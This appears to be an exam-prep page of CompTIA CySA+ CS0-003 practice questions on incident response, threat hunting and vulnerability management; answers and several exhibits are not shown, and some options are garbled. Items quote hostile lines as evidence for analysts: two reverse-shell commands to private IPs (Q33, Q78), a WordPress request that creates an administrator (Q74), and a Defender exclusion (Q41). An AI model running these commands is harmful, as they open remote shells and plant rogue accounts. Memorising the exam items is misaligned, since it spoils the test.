New Year Special Sale - Limited Time 70% Discount Offer - Ends in 0d 00h 00m 00s - Coupon code: mxmas70

Home > CompTIA > CompTIA CySA+ > CS0-003

CS0-003 CompTIA CyberSecurity Analyst CySA+ Certification Exam Question and Answers

Question # 4

A threat hunter seeks to identify new persistence mechanisms installed in an organization's environment. In collecting scheduled tasks from all enterprise workstations, the following host details are aggregated:

Which of the following actions should the hunter perform first based on the details above?

A.

Acquire a copy of taskhw.exe from the impacted host

B.

Scan the enterprise to identify other systems with taskhw.exe present

C.

Perform a public search for malware reports on taskhw.exe.

D.

Change the account that runs the -caskhw. exe scheduled task

Full Access
Question # 5

While reviewing web server logs, a security analyst found the following line:

Which of the following malicious activities was attempted?

A.

Command injection

B.

XML injection

C.

Server-side request forgery

D.

Cross-site scripting

Full Access
Question # 6

An analyst is suddenly unable to enrich data from the firewall. However, the other open intelligence feeds continue to work. Which of the following is the most likely reason the firewall feed stopped working?

A.

The firewall service account was locked out.

B.

The firewall was using a paid feed.

C.

The firewall certificate expired.

D.

The firewall failed open.

Full Access
Question # 7

An analyst is conducting monitoring against an authorized team that win perform adversarial techniques. The analyst interacts with the team twice per day to set the stage for the techniques to be used. Which of the following teams is the analyst a member of?

A.

Orange team

B.

Blue team

C.

Red team

D.

Purple team

Full Access
Question # 8

A security analyst found the following vulnerability on the company’s website:

Which of the following should be implemented to prevent this type of attack in the future?

A.

Input sanitization

B.

Output encoding

C.

Code obfuscation

D.

Prepared statements

Full Access
Question # 9

A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago: but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer?

A.

SLA

B.

MOU

C.

NDA

D.

Limitation of liability

Full Access
Question # 10

Which of the following best describes the goal of a disaster recovery exercise as preparation for possible incidents?

A.

TO provide metrics and test continuity controls

B.

To verify the roles of the incident response team

C.

To provide recommendations for handling vulnerabilities

D.

To perform tests against implemented security controls

Full Access
Question # 11

An organization's threat intelligence team notes a recent trend in adversary privilege escalation procedures. Multiple threat groups have been observed utilizing native Windows tools to bypass system controls and execute commands with privileged credentials. Which of the following controls would be most effective to reduce the rate of success of such attempts?

A.

Disable administrative accounts for any operations.

B.

Implement MFA requirements for all internal resources.

C.

Harden systems by disabling or removing unnecessary services.

D.

Implement controls to block execution of untrusted applications.

Full Access
Question # 12

During a tabletop exercise, engineers discovered that an ICS could not be updated due to hardware versioning incompatibility. Which of the following is the most likely cause of this issue?

A.

Legacy system

B.

Business process interruption

C.

Degrading functionality

D.

Configuration management

Full Access
Question # 13

A company has the following security requirements:

. No public IPs

· All data secured at rest

. No insecure ports/protocols

After a cloud scan is completed, a security analyst receives reports that several misconfigurations are putting the company at risk. Given the following cloud scanner output:

Which of the following should the analyst recommend be updated first to meet the security requirements and reduce risks?

A.

VM_PRD_DB

B.

VM_DEV_DB

C.

VM_DEV_Web02

D.

VM_PRD_Web01

Full Access
Question # 14

A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files?

A.

Change the display filter to f cp. accive. pore

B.

Change the display filter to tcg.port=20

C.

Change the display filter to f cp-daca and follow the TCP streams

D.

Navigate to the File menu and select FTP from the Export objects option

Full Access
Question # 15

Several critical bugs were identified during a vulnerability scan. The SLA risk requirement is that all critical vulnerabilities should be patched within 24 hours. After sending a notification to the asset owners, the patch cannot be deployed due to planned, routine system upgrades Which of the following is the best method to remediate the bugs?

A.

Reschedule the upgrade and deploy the patch

B.

Request an exception to exclude the patch from installation

C.

Update the risk register and request a change to the SLA

D.

Notify the incident response team and rerun the vulnerability scan

Full Access
Question # 16

After completing a review of network activity. the threat hunting team discovers a device on the network that sends an outbound email via a mail client to a non-company email address daily

at 10:00 p.m. Which of the following is potentially occurring?

A.

Irregular peer-to-peer communication

B.

Rogue device on the network

C.

Abnormal OS process behavior

D.

Data exfiltration

Full Access
Question # 17

An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first?

A.

CDN

B.

Vulnerability scanner

C.

DNS

D.

Web server

Full Access
Question # 18

The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization?

A.

A mean time to remediate of 30 days

B.

A mean time to detect of 45 days

C.

A mean time to respond of 15 days

D.

Third-party application testing

Full Access
Question # 19

When undertaking a cloud migration of multiple SaaS application, an organizations system administrator struggled … identity and access management to cloud-based assets. Which of the following service models would have reduced the complexity of this project?

A.

CASB

B.

SASE

C.

ZTNA

D.

SWG

Full Access
Question # 20

During a scan of a web server in the perimeter network, a vulnerability was identified that could be exploited over port 3389. The web server is protected by a WAF. Which of the following best represents the change to overall risk associated with this vulnerability?

A.

The risk would not change because network firewalls are in use.

B.

The risk would decrease because RDP is blocked by the firewall.

C.

The risk would decrease because a web application firewall is in place.

D.

The risk would increase because the host is external facing.

Full Access
Question # 21

Following a recent security incident, the Chief Information Security Officer is concerned with improving visibility and reporting of malicious actors in the environment. The goal is to reduce the time to prevent lateral movement and potential data exfiltration. Which of the following techniques will best achieve the improvement?

A.

Mean time to detect

B.

Mean time to respond

C.

Mean time to remediate

D.

Service-level agreement uptime

Full Access
Question # 22

A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement?

A.

External

B.

Agent-based

C.

Non-credentialed

D.

Credentialed

Full Access
Question # 23

A security analyst receives an alert for suspicious activity on a company laptop An excerpt of the log is shown below:

Which of the following has most likely occurred?

A.

An Office document with a malicious macro was opened.

B.

A credential-stealing website was visited.

C.

A phishing link in an email was clicked

D.

A web browser vulnerability was exploited.

Full Access
Question # 24

A manufacturer has hired a third-party consultant to assess the security of an OT network that includes both fragile and legacy equipment Which of the following must be considered to ensure the consultant does no harm to operations?

A.

Employing Nmap Scripting Engine scanning techniques

B.

Preserving the state of PLC ladder logic prior to scanning

C.

Using passive instead of active vulnerability scans

D.

Running scans during off-peak manufacturing hours

Full Access
Question # 25

Which of the following makes STIX and OpenloC information readable by both humans and machines?

A.

XML

B.

URL

C.

OVAL

D.

TAXII

Full Access
Question # 26

A security analyst recently used Arachni to perform a vulnerability assessment of a newly developed web application. The analyst is concerned about the following output:

[+] XSS: In form input 'txtSearch' with action https://localhost/search.aspx

[-] XSS: Analyzing response #1...

[-] XSS: Analyzing response #2...

[-] XSS: Analyzing response #3...

[+] XSS: Response is tainted. Looking for proof of the vulnerability.

Which of the following is the most likely reason for this vulnerability?

A.

The developer set input validation protection on the specific field of search.aspx.

B.

The developer did not set proper cross-site scripting protections in the header.

C.

The developer did not implement default protections in the web application build.

D.

The developer did not set proper cross-site request forgery protections.

Full Access
Question # 27

A cybersecurity team has witnessed numerous vulnerability events recently that have affected operating systems. The team decides to implement host-based IPS, firewalls, and two-factor authentication. Which of the following

does this most likely describe?

A.

System hardening

B.

Hybrid network architecture

C.

Continuous authorization

D.

Secure access service edge

Full Access
Question # 28

Which of the following explains the importance of a timeline when providing an incident response report?

A.

The timeline contains a real-time record of an incident and provides information that helps to simplify a postmortem analysis.

B.

An incident timeline provides the necessary information to understand the actions taken to mitigate the threat or risk.

C.

The timeline provides all the information, in the form of a timetable, of the whole incident response process including actions taken.

D.

An incident timeline presents the list of commands executed by an attacker when the system was compromised, in the form of a timetable.

Full Access
Question # 29

A security administrator has found indications of dictionary attacks against the company's external-facing portal. Which of the following should be implemented to best mitigate the password attacks?

A.

Multifactor authentication

B.

Password complexity

C.

Web application firewall

D.

Lockout policy

Full Access
Question # 30

An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:

Which of the following tuning recommendations should the security analyst share?

A.

Set an HttpOnlvflaq to force communication by HTTPS

B.

Block requests without an X-Frame-Options header

C.

Configure an Access-Control-Allow-Origin header to authorized domains

D.

Disable the cross-origin resource sharing header

Full Access
Question # 31

A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing?

A.

Firewall logs

B.

Indicators of compromise

C.

Risk assessment

D.

Access control lists

Full Access
Question # 32

A Chief Information Security Officer has outlined several requirements for a new vulnerability scanning project:

. Must use minimal network bandwidth

. Must use minimal host resources

. Must provide accurate, near real-time updates

. Must not have any stored credentials in configuration on the scanner

Which of the following vulnerability scanning methods should be used to best meet these requirements?

A.

Internal

B.

Agent

C.

Active

D.

Uncredentialed

Full Access
Question # 33

A security analyst identified the following suspicious entry on the host-based IDS logs:

bash -i >& /dev/tcp/10.1.2.3/8080 0>&1

Which of the following shell scripts should the analyst use to most accurately confirm if the activity is ongoing?

A.

#!/bin/bash

nc 10.1.2.3 8080 -vv >dev/null && echo "Malicious activity" Il echo "OK"

B.

#!/bin/bash

ps -fea | grep 8080 >dev/null && echo "Malicious activity" I| echo "OK"

C.

#!/bin/bash

ls /opt/tcp/10.1.2.3/8080 >dev/null && echo "Malicious activity" I| echo "OK"

D.

#!/bin/bash

netstat -antp Igrep 8080 >dev/null && echo "Malicious activity" I| echo "OK"

Full Access
Question # 34

You are a cybersecurity analyst tasked with interpreting scan data from Company As servers You must verify the requirements are being met for all of the servers and recommend changes if you find they are not

The company's hardening guidelines indicate the following

• TLS 1 2 is the only version of TLS

running.

• Apache 2.4.18 or greater should be used.

• Only default ports should be used.

INSTRUCTIONS

using the supplied data. record the status of compliance With the company’s guidelines for each server.

The question contains two parts: make sure you complete Part 1 and Part 2. Make recommendations for Issues based ONLY on the hardening guidelines provided.

Part 1:

AppServ1:

AppServ2:

AppServ3:

AppServ4:

Part 2:

Full Access
Question # 35

Which of the following describes the best reason for conducting a root cause analysis?

A.

The root cause analysis ensures that proper timelines were documented.

B.

The root cause analysis allows the incident to be properly documented for reporting.

C.

The root cause analysis develops recommendations to improve the process.

D.

The root cause analysis identifies the contributing items that facilitated the event

Full Access
Question # 36

A Chief Information Security Officer (CISO) is concerned that a specific threat actor who is known to target the company's business type may be able to breach the network and remain inside of it for an extended period of time.

Which of the following techniques should be performed to meet the CISO's goals?

A.

Vulnerability scanning

B.

Adversary emulation

C.

Passive discovery

D.

Bug bounty

Full Access
Question # 37

Which of the following best describes the threat concept in which an organization works to ensure that all network users only open attachments from known sources?

A.

Hacktivist threat

B.

Advanced persistent threat

C.

Unintentional insider threat

D.

Nation-state threat

Full Access
Question # 38

An incident response team is working with law enforcement to investigate an active web server compromise. The decision has been made to keep the server running and to implement compensating controls for a period of time. The web service must be accessible from the internet via the reverse proxy and must connect to a database server. Which of the following compensating controls will help contain the adversary while meeting the other requirements? (Select two).

A.

Drop the tables on the database server to prevent data exfiltration.

B.

Deploy EDR on the web server and the database server to reduce the adversaries capabilities.

C.

Stop the httpd service on the web server so that the adversary can not use web exploits

D.

use micro segmentation to restrict connectivity to/from the web and database servers.

E.

Comment out the HTTP account in the / etc/passwd file of the web server

F.

Move the database from the database server to the web server.

Full Access
Question # 39

A security manager is looking at a third-party vulnerability metric (SMITTEN) to improve upon the company's current method that relies on CVSSv3. Given the following:

Which of the following vulnerabilities should be prioritized?

A.

Vulnerability 1

B.

Vulnerability 2

C.

Vulnerability 3

D.

Vulnerability 4

Full Access
Question # 40

An organization was compromised, and the usernames and passwords of all em-ployees were leaked online. Which of the following best describes the remedia-tion that could reduce the impact of this situation?

A.

Multifactor authentication

B.

Password changes

C.

System hardening

D.

Password encryption

Full Access
Question # 41

An employee downloads a freeware program to change the desktop to the classic look of legacy Windows. Shortly after the employee installs the program, a high volume of random DNS queries begin

to originate from the system. An investigation on the system reveals the following:

Add-MpPreference -ExclusionPath '%Program Filest\ksysconfig'

Which of the following is possibly occurring?

A.

Persistence

B.

Privilege escalation

C.

Credential harvesting

D.

Defense evasion

Full Access
Question # 42

Which of the following threat actors is most likely to target a company due to its questionable environmental policies?

A.

Hacktivist

B.

Organized crime

C.

Nation-state

D.

Lone wolf

Full Access
Question # 43

An attacker recently gained unauthorized access to a financial institution's database, which contains confidential information. The attacker exfiltrated a large amount of data before being detected and blocked. A security analyst needs to complete a root cause analysis to determine how the attacker was able to gain access. Which of the following should the analyst perform first?

A.

Document the incident and any findings related to the attack for future reference.

B.

Interview employees responsible for managing the affected systems.

C.

Review the log files that record all events related to client applications and user access.

D.

Identify the immediate actions that need to be taken to contain the incident and minimize damage.

Full Access
Question # 44

Several vulnerability scan reports have indicated runtime errors as the code is executing. The dashboard that lists the errors has a command-line interface for developers to check for vulnerabilities. Which of the following will enable a developer to correct this issue? (Select two).

A.

Performing dynamic application security testing

B.

Reviewing the code

C.

Fuzzing the application

D.

Debugging the code

E.

Implementing a coding standard

F.

Implementing IDS

Full Access
Question # 45

An organization needs to bring in data collection and aggregation from various endpoints. Which of the following is the best tool to deploy to help analysts gather this data?

A.

DLP

B.

NAC

C.

EDR

D.

NIDS

Full Access
Question # 46

Which of the following actions would an analyst most likely perform after an incident has been investigated?

A.

Risk assessment

B.

Root cause analysis

C.

Incident response plan

D.

Tabletop exercise

Full Access
Question # 47

An organization has noticed large amounts of data are being sent out of its network. An

analyst is identifying the cause of the data exfiltration.

INSTRUCTIONS

Select the command that generated the output in tabs 1 and 2.

Review the output text in all tabs and identify the file responsible for the malicious

behavior.

If at any time you would like to bring back the initial state of the simulation, please click

the Reset All button.

Full Access
Question # 48

During an incident, a security analyst discovers a large amount of Pll has been emailed externally from an employee to a public email address. The analyst finds that the external email is the employee's

personal email. Which of the following should the analyst recommend be done first?

A.

Place a legal hold on the employee's mailbox.

B.

Enable filtering on the web proxy.

C.

Disable the public email access with CASB.

D.

Configure a deny rule on the firewall.

Full Access
Question # 49

A regulated organization experienced a security breach that exposed a list of customer names with corresponding PH data. Which of the following is the best reason for developing the organization's communication plans?

A.

For the organization's public relations department to have a standard notification

B.

To ensure incidents are immediately reported to a regulatory agency

C.

To automate the notification to customers who were impacted by the breach

D.

To have approval from executive leadership on when communication should occur

Full Access
Question # 50

A security analyst has found the following suspicious DNS traffic while analyzing a packet capture:

• DNS traffic while a tunneling session is active.

• The mean time between queries is less than one second.

• The average query length exceeds 100 characters.

Which of the following attacks most likely occurred?

A.

DNS exfiltration

B.

DNS spoofing

C.

DNS zone transfer

D.

DNS poisoning

Full Access
Question # 51

Which of the following is a reason why proper handling and reporting of existing evidence are important for the investigation and reporting phases of an incident response?

A.

TO ensure the report is legally acceptable in case it needs to be presented in court

B.

To present a lessons-learned analysis for the incident response team

C.

To ensure the evidence can be used in a postmortem analysis

D.

To prevent the possible loss of a data source for further root cause analysis

Full Access
Question # 52

A company recently removed administrator rights from all of its end user workstations. An analyst uses CVSSv3.1 exploitability metrics to prioritize the vulnerabilities for the workstations and produces the following information:

Which of the following vulnerabilities should be prioritized for remediation?

A.

nessie.explosion

B.

vote.4p

C.

sweet.bike

D.

great.skills

Full Access
Question # 53

Which of following would best mitigate the effects of a new ransomware attack that was not properly stopped by the company antivirus?

A.

Install a firewall.

B.

Implement vulnerability management.

C.

Deploy sandboxing.

D.

Update the application blocklist.

Full Access
Question # 54

The management team requests monthly KPI reports on the company's cybersecurity program. Which of the following KPIs would identify how long a security threat goes unnoticed in the environment?

A.

Employee turnover

B.

Intrusion attempts

C.

Mean time to detect

D.

Level of preparedness

Full Access
Question # 55

A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in?

A.

Weaponization

B.

Reconnaissance

C.

Delivery

D.

Exploitation

Full Access
Question # 56

An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to?

A.

PCI Security Standards Council

B.

Local law enforcement

C.

Federal law enforcement

D.

Card issuer

Full Access
Question # 57

A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective?

A.

function w() { info=$(ping -c 1 $1 | awk -F “/” ‘END{print $1}’) && echo “$1 | $info” }

B.

function x() { info=$(geoiplookup $1) && echo “$1 | $info” }

C.

function y() { info=$(dig -x $1 | grep PTR | tail -n 1 ) && echo “$1 | $info” }

D.

function z() { info=$(traceroute -m 40 $1 | awk ‘END{print $1}’) && echo “$1 | $info” }

Full Access
Question # 58

An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe?

A.

Eradication

B.

Recovery

C.

Containment

D.

Preparation

Full Access
Question # 59

A security analyst is trying to detect connections to a suspicious IP address by collecting the packet captures from the gateway. Which of the following commands should the security analyst consider running?

A.

grep [IP address] packets.pcap

B cat packets.pcap | grep [IP Address]

B.

tcpdump -n -r packets.pcap host [IP address]

C.

strings packets.pcap | grep [IP Address]

Full Access
Question # 60

A company's user accounts have been compromised. Users are also reporting that the company's internal portal is sometimes only accessible through HTTP, other times; it is accessible through HTTPS. Which of the following most likely describes the observed activity?

A.

There is an issue with the SSL certificate causinq port 443 to become unavailable for HTTPS access

B.

An on-path attack is being performed by someone with internal access that forces users into port 80

C.

The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80

D.

An error was caused by BGP due to new rules applied over the company's internal routers

Full Access
Question # 61

A security analyst has found a moderate-risk item in an organization's point-of-sale application. The organization is currently in a change freeze window and has decided that the risk is not high enough to correct at this time. Which of the following inhibitors to remediation does this scenario illustrate?

A.

Service-level agreement

B.

Business process interruption

C.

Degrading functionality

D.

Proprietary system

Full Access
Question # 62

A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did?

A.

Data enrichment

B.

Security control plane

C.

Threat feed combination

D.

Single pane of glass

Full Access
Question # 63

Which of the following is the best way to begin preparation for a report titled "What We Learned" regarding a recent incident involving a cybersecurity breach?

A.

Determine the sophistication of the audience that the report is meant for

B.

Include references and sources of information on the first page

C.

Include a table of contents outlining the entire report

D.

Decide on the color scheme that will effectively communicate the metrics

Full Access
Question # 64

A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis?

A.

Code analysis

B.

Static analysis

C.

Reverse engineering

D.

Fuzzing

Full Access
Question # 65

A company has a primary control in place to restrict access to a sensitive database. However, the company discovered an authentication vulnerability that could bypass this control. Which of the following is the best compensating control?

A.

Running regular penetration tests to identify and address new vulnerabilities

B.

Conducting regular security awareness training of employees to prevent social engineering attacks

C.

Deploying an additional layer of access controls to verify authorized individuals

D.

Implementing intrusion detection software to alert security teams of unauthorized access attempts

Full Access
Question # 66

Which of the following techniques can help a SOC team to reduce the number of alerts related to the internal security activities that the analysts have to triage?

A.

Enrich the SIEM-ingested data to include all data required for triage.

B.

Schedule a task to disable alerting when vulnerability scans are executing.

C.

Filter all alarms in the SIEM with low severity.

D.

Add a SOAR rule to drop irrelevant and duplicated notifications.

Full Access
Question # 67

An analyst investigated a website and produced the following:

Starting Nmap 7.92 ( https://nmap.org ) at 2022-07-21 10:21 CDT

Nmap scan report for insecure.org (45.33.49.119)

Host is up (0.054s latency).

rDNS record for 45.33.49.119: ack.nmap.org

Not shown: 95 filtered tcp ports (no-response)

PORT STATE SERVICE VERSION

22/tcp open ssh OpenSSH 7.4 (protocol 2.0)

25/tcp closed smtp

80/tcp open http Apache httpd 2.4.6

113/tcp closed ident

443/tcp open ssl/http Apache httpd 2.4.6

Service Info: Host: issues.nmap.org

Service detection performed. Please report any incorrect results at https://nmap .org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 20.52 seconds

Which of the following syntaxes did the analyst use to discover the application versions on this vulnerable website?

A.

nmap-sS -T4 -F insecure.org

B.

nmap-0 insecure.org

C.

nmap-sV -T4 -F insecure.org

D.

nmap-A insecure.org

Full Access
Question # 68

An organization's email account was compromised by a bad actor. Given the following Information:

Which of the following is the length of time the team took to detect the threat?

A.

25 minutes

B.

40 minutes

C.

45 minutes

D.

2 hours

Full Access
Question # 69

A technician is analyzing output from a popular network mapping tool for a PCI audit:

Which of the following best describes the output?

A.

The host is not up or responding.

B.

The host is running excessive cipher suites.

C.

The host is allowing insecure cipher suites.

D.

The Secure Shell port on this host is closed

Full Access
Question # 70

An analyst is examining events in multiple systems but is having difficulty correlating data points. Which of the following is most likely the issue with the system?

A.

Access rights

B.

Network segmentation

C.

Time synchronization

D.

Invalid playbook

Full Access
Question # 71

A security analyst at a company called ACME Commercial notices there is outbound traffic to a host IP that resolves to https://offce365password.acme.co. The site 's standard VPN logon page is

www.acme.com/logon. Which of the following is most likely true?

A.

This is a normal password change URL.

B.

The security operations center is performing a routine password audit.

C.

A new VPN gateway has been deployed

D.

A social engineering attack is underway

Full Access
Question # 72

After a security assessment was done by a third-party consulting firm, the cybersecurity program recommended integrating DLP and CASB to reduce analyst alert fatigue. Which of the following is the best possible outcome that this effort hopes to achieve?

A.

SIEM ingestion logs are reduced by 20%.

B.

Phishing alerts drop by 20%.

C.

False positive rates drop to 20%.

D.

The MTTR decreases by 20%.

Full Access
Question # 73

A security analyst must preserve a system hard drive that was involved in a litigation request Which of the following is the best method to ensure the data on the device is not modified?

A.

Generate a hash value and make a backup image.

B.

Encrypt the device to ensure confidentiality of the data.

C.

Protect the device with a complex password.

D.

Perform a memory scan dump to collect residual data.

Full Access
Question # 74

An analyst has received an IPS event notification from the SIEM stating an IP address, which is known to be malicious, has attempted to exploit a zero-day vulnerability on several web servers. The exploit contained the following snippet:

/wp-json/trx_addons/V2/get/sc_layout?sc=wp_insert_user&role=administrator

Which of the following controls would work best to mitigate the attack represented by this snippet?

A.

Limit user creation to administrators only.

B.

Limit layout creation to administrators only.

C.

Set the directory trx_addons to read only for all users.

D.

Set the directory v2 to read only for all users.

Full Access
Question # 75

Which of the following best explains the importance of network microsegmentation as part of a Zero Trust architecture?

A.

To allow policies that are easy to manage and less granular

B.

To increase the costs associated with regulatory compliance

C.

To limit how far an attack can spread

D.

To reduce hardware costs with the use of virtual appliances

Full Access
Question # 76

An organization has established a formal change management process after experiencing several critical system failures over the past year. Which of the following are key factors that the change management process will include in order to reduce the impact of system failures? (Select two).

A.

Ensure users the document system recovery plan prior to deployment.

B.

Perform a full system-level backup following the change.

C.

Leverage an audit tool to identify changes that are being made.

D.

Identify assets with dependence that could be impacted by the change.

E.

Require diagrams to be completed for all critical systems.

F.

Ensure that all assets are properly listed in the inventory management system.

Full Access
Question # 77

Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future?

A.

Develop a call tree to inform impacted users

B.

Schedule a review with all teams to discuss what occurred

C.

Create an executive summary to update company leadership

D.

Review regulatory compliance with public relations for official notification

Full Access
Question # 78

A security analyst detected the following suspicious activity:

rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 > tmp/f

Which of the following most likely describes the activity?

A.

Network pivoting

B.

Host scanning

C.

Privilege escalation

D.

Reverse shell

Full Access
Question # 79

The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results?

A.

Single pane of glass

B.

Single sign-on

C.

Data enrichment

D.

Deduplication

Full Access
Question # 80

Which of the following should be updated after a lessons-learned review?

A.

Disaster recovery plan

B.

Business continuity plan

C.

Tabletop exercise

D.

Incident response plan

Full Access
Question # 81

Which of the following would help an analyst to quickly find out whether the IP address in a SIEM alert is a known-malicious IP address?

A.

Join an information sharing and analysis center specific to the company's industry.

B.

Upload threat intelligence to the IPS in STIX/TAXII format.

C.

Add data enrichment for IPS in the ingestion pipleline.

D.

Review threat feeds after viewing the SIEM alert.

Full Access
Question # 82

During the log analysis phase, the following suspicious command is detected-

Which of the following is being attempted?

A.

Buffer overflow

B.

RCE

C.

ICMP tunneling

D.

Smurf attack

Full Access
Question # 83

Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer's customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend?

A.

Isolate Joe's PC from the network

B.

Reimage the PC based on standard operating procedures

C.

Initiate a remote wipe of Joe's PC using mobile device management

D.

Perform no action until HR or legal counsel advises on next steps

Full Access
Question # 84

An analyst is evaluating a vulnerability management dashboard. The analyst sees that a previously remediated vulnerability has reappeared on a database server. Which of the following is the most likely cause?

A.

The finding is a false positive and should be ignored.

B.

A rollback had been executed on the instance.

C.

The vulnerability scanner was configured without credentials.

D.

The vulnerability management software needs to be updated.

Full Access
Question # 85

A security analyst reviews the following Arachni scan results for a web application that stores PII data:

Which of the following should be remediated first?

A.

SQL injection

B.

RFI

C.

XSS

D.

Code injection

Full Access
Question # 86

During an incident, some loCs of possible ransomware contamination were found in a group of servers in a segment of the network. Which of the following steps should be taken next?

A.

Isolation

B.

Remediation

C.

Reimaging

D.

Preservation

Full Access
Question # 87

You are a penetration tester who is reviewing the system hardening guidelines for a company. Hardening guidelines indicate the following.

    There must be one primary server or service per device.

    Only default port should be used

    Non- secure protocols should be disabled.

    The corporate internet presence should be placed in a protected subnet

Instructions :

    Using the available tools, discover devices on the corporate network and the services running on these devices.

You must determine

    ip address of each device

    The primary server or service each device

    The protocols that should be disabled based on the hardening guidelines

Full Access
Question # 88

An analyst is becoming overwhelmed with the number of events that need to be investigated for a timeline. Which of the following should the analyst focus on in order to move the incident forward?

A.

Impact

B.

Vulnerability score

C.

Mean time to detect

D.

Isolation

Full Access
Question # 89

A systems administrator is reviewing after-hours traffic flows from data center servers and sees regular, outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation?

A.

Command-and-control beaconing activity

B.

Data exfiltration

C.

Anomalous activity on unexpected ports

D.

Network host IP address scanning

E.

A rogue network device

Full Access
Question # 90

A payroll department employee was the target of a phishing attack in which an attacker impersonated a department director and requested that direct deposit information be updated to a new account. Afterward, a deposit was made into the unauthorized account. Which of the following is one of the first actions the incident response team should take when they receive notification of the attack?

A.

Scan the employee's computer with virus and malware tools.

B.

Review the actions taken by the employee and the email related to the event

C.

Contact human resources and recommend the termination of the employee.

D.

Assign security awareness training to the employee involved in the incident.

Full Access
Question # 91

A network analyst notices a long spike in traffic on port 1433 between two IP addresses on opposite sides of a WAN connection. Which of the following is the most likely cause?

A.

A local red team member is enumerating the local RFC1918 segment to enumerate hosts.

B.

A threat actor has a foothold on the network and is sending out control beacons.

C.

An administrator executed a new database replication process without notifying the SOC.

D.

An insider threat actor is running Responder on the local segment, creating traffic replication.

Full Access
Question # 92

During a security test, a security analyst found a critical application with a buffer overflow vulnerability. Which of the following would be best to mitigate the vulnerability at the application level?

A.

Perform OS hardening.

B.

Implement input validation.

C.

Update third-party dependencies.

D.

Configure address space layout randomization.

Full Access
Question # 93

A security analyst needs to secure digital evidence related to an incident. The security analyst must ensure that the accuracy of the data cannot be repudiated. Which of the following should be implemented?

A.

Offline storage

B.

Evidence collection

C.

Integrity validation

D.

Legal hold

Full Access
Question # 94

A security analyst discovers an ongoing ransomware attack while investigating a phishing email. The analyst downloads a copy of the file from the email and isolates the affected workstation from the network. Which of the following activities should the analyst perform next?

A.

Wipe the computer and reinstall software

B.

Shut down the email server and quarantine it from the network.

C.

Acquire a bit-level image of the affected workstation.

D.

Search for other mail users who have received the same file.

Full Access
Question # 95

A security analyst is reviewing events that occurred during a possible compromise. The analyst obtains the following log:

Which of the following is most likely occurring, based on the events in the log?

A.

An adversary is attempting to find the shortest path of compromise.

B.

An adversary is performing a vulnerability scan.

C.

An adversary is escalating privileges.

D.

An adversary is performing a password stuffing attack.

.

Full Access
Question # 96

Which of the following is an important aspect that should be included in the lessons-learned step after an incident?

A.

Identify any improvements or changes in the incident response plan or procedures

B.

Determine if an internal mistake was made and who did it so they do not repeat the error

C.

Present all legal evidence collected and turn it over to iaw enforcement

D.

Discuss the financial impact of the incident to determine if security controls are well spent

Full Access
Question # 97

Which of the following best describes the document that defines the expectation to network customers that patching will only occur between 2:00 a.m. and 4:00 a.m.?

A.

SLA

B.

LOI

C.

MOU

D.

KPI

Full Access
Question # 98

A security team conducts a lessons-learned meeting after struggling to determine who should conduct the next steps following a security event. Which of the following should the team create to address this issue?

A.

Service-level agreement

B.

Change management plan

C.

Incident response plan

D.

Memorandum of understanding

Full Access
Question # 99

A systems administrator notices unfamiliar directory names on a production server. The administrator reviews the directory listings and files, and then concludes the server has been

compromised. Which of the following steps should the administrator take next?

A.

Inform the internal incident response team.

B.

Follow the company's incident response plan.

C.

Review the lessons learned for the best approach.

D.

Determine when the access started.

Full Access
Question # 100

An organization is conducting a pilot deployment of an e-commerce application. The application's source code is not available. Which of the following strategies should an analyst recommend to evaluate the security of the software?

A.

Static testing

B.

Vulnerability testing

C.

Dynamic testing

D.

Penetration testing

Full Access
Question # 101

Which of the following will most likely ensure that mission-critical services are available in the event of an incident?

A.

Business continuity plan

B.

Vulnerability management plan

C.

Disaster recovery plan

D.

Asset management plan

Full Access
Question # 102

Which of the following describes a contract that is used to define the various levels of maintenance to be provided by an external business vendor in a secure environment?

A.

MOU

B.

NDA

C.

BIA

D.

SLA

Full Access
Question # 103

Due to an incident involving company devices, an incident responder needs to take a mobile phone to the lab for further investigation. Which of the following tools should be used to maintain the integrity of the mobile phone while it is transported? (Select two).

A.

Signal-shielded bag

B.

Tamper-evident seal

C.

Thumb drive

D.

Crime scene tape

E.

Write blocker

F.

Drive duplicator

Full Access
Question # 104

A small company does no! have enough staff to effectively segregate duties to prevent error and fraud in payroll management. The Chief Information Security Officer (CISO) decides to maintain and review logs and audit trails to mitigate risk. Which of the following did the CISO implement?

A.

Corrective controls

B.

Compensating controls

C.

Operational controls

D.

